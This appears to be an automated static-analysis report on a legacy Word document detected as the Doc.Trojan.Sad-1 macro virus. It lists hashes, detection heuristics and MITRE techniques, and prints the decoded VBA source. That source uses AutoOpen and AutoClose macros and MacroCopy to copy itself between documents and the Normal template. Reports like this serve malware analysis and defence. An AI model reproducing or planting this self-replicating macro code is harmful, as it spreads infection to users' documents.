Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8d3b78f81a3b073…

MALICIOUS

Office (OLE)

174.5 KB Created: 1999-04-06 10:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a1433191a0c231bcf922573a2ae76753 SHA-1: 1810ec0f7f3d5e28b3abc6002f58a516d4bee9d1 SHA-256: c8d3b78f81a3b073092dfc3a1ad2ff61ff65b216904e4aa7b75227d3bcb0994a
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, specifically AutoOpen and Auto_Close, which are designed to execute automatically. The macros copy themselves to other locations, suggesting an attempt to establish persistence or prepare for further execution. The ClamAV detection as 'Doc.Trojan.Sad-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Sad-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sad-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1142 bytes
SHA-256: cef77b0dbc37fc8deb5bfe730897ece7dbd4cad87111e94f41318c6788942cfa
Detection
ClamAV: Doc.Trojan.Sad-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sad"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Installed to your NORMAL template as AutoClose to clean the prank macros from any documents that you open then close."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.VClose.MAIN"
Dim Micro$
Dim Logic$
    On Error GoTo -1: On Error GoTo Abort

        WordBasic.FileSaveAs Format:=1

        Micro$ = WordBasic.[FileName$]()

        Logic$ = Micro$ + ":AutoOpen"
        WordBasic.MacroCopy "Global:Module1", Logic$

        Logic$ = Micro$ + ":Sad"
        WordBasic.MacroCopy "Global:AutoClose", Logic$

        WordBasic.FileSaveAs Format:=1

Abort:
End Sub
Public Sub Logic()
Rem I am not a Genius ;-)
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim Micro$
Dim Logic$
    On Error GoTo -1: On Error GoTo Abort
    
            Micro$ = WordBasic.[FileName$]()

           
            Logic$ = Micro$ + ":AutoOpen"
            WordBasic.MacroCopy Logic$, "Global:Module1"

            Logic$ = Micro$ + ":Sad"
            WordBasic.MacroCopy Logic$, "Global:AutoClose"

Abort:
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_983436825/Ole10Native 896 bytes
SHA-256: 3e01369858f0fa605a5c2bdb3a6a1c585400cea4d0297f131bc6b75a5953214f
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_984919303/Ole10Native 896 bytes
SHA-256: 294d085777573769b08fcb38609be42d78bf08da64dc9940c11e04c22e99d963

Open this report in the interactive analyzer, or submit your own file for analysis.